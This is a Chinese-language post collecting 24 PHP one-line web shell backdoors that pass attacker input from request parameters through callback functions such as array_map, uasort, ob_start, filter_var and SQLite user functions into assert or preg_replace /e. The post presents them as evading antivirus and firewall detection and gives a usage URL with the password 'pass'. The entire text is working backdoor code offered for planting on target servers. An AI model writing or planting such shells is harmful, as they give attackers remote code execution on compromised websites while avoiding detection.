前言
分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8 、或sqlite/pdo/yaml/memcached扩展等)
原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是:
http:// target/shell.php?e=assert 密码pass
正文
01
1 2 3
| $e = $_REQUEST['e']; $arr = array($_POST['pass'],); array_filter($arr, $e);
|
02
1 2 3
| $e = $_REQUEST['e']; $arr = array($_POST['pass'],); array_map($e, $arr);
|
03
1 2 3
| $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['pass']); uasort($arr, $e);
|
04
1 2 3
| $e = $_REQUEST['e']; $arr = array('test' => 1, $_REQUEST['pass'] => 2); uksort($arr, $e);
|
05
1 2
| $arr = new ArrayObject(array('test', $_REQUEST['pass'])); $arr->uasort('assert');
|
06
1 2
| $arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2)); $arr->uksort('assert');
|
07
1 2 3
| $e = $_REQUEST['e']; $arr = array(1); array_reduce($arr, $e, $_POST['pass']);
|
08
1 2 3 4
| $e = $_REQUEST['e']; $arr = array($_POST['pass']); $arr2 = array(1); array_udiff($arr, $arr2, $e);
|
09
1 2 3
| $e = $_REQUEST['e']; $arr = array($_POST['pass'] => '|.*|e',); array_walk($arr, $e, '');
|
10
1 2 3
| $e = $_REQUEST['e']; $arr = array($_POST['pass'] => '|.*|e',); array_walk_recursive($arr, $e, '');
|
11
1
| mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e')
|
12
1
| echo preg_filter('|.*|e', $_REQUEST['pass'], '');
|
13
1 2 3
| ob_start('assert'); echo $_REQUEST['pass']; ob_end_flush();
|
14
1 2
| $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['pass']);
|
15
1 2 3
| $e = $_REQUEST['e']; declare(ticks=1); register_tick_function($e, $_REQUEST['pass']);
|
16
1
| filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
|
17
1
| filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
|
18
1 2 3 4 5
| $e = $_REQUEST['e']; $db = new PDO('sqlite:sqlite.db3'); $db->sqliteCreateFunction('myfunc', $e, 1); $sth = $db->prepare("SELECT myfunc(:exec)"); $sth->execute(array(':exec' => $_REQUEST['pass']));
|
19
1 2 3 4 5 6
| $e = $_REQUEST['e']; $db = new SQLite3('sqlite.db3'); $db->createFunction('myfunc', $e); $stmt = $db->prepare("SELECT myfunc(?)"); $stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT); $stmt->execute();
|
20
1 2 3 4 5
| $str = urlencode($_REQUEST['pass']); $yaml = <<<EOD greeting: !{$str} "|. |e" EOD; $parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));
|
21
1 2 3
| $mem = new Memcache() $re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);')) $mem->connect($_REQUEST['pass'], 11211, 0)
|
22
1
| preg_replace_callback('/. /i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass'])
|
23
1
| mb_ereg_replace_callback('. ', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass'])
|
24
1 2
| $iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);')); foreach ($iterator as $item) {echo $item;}
|
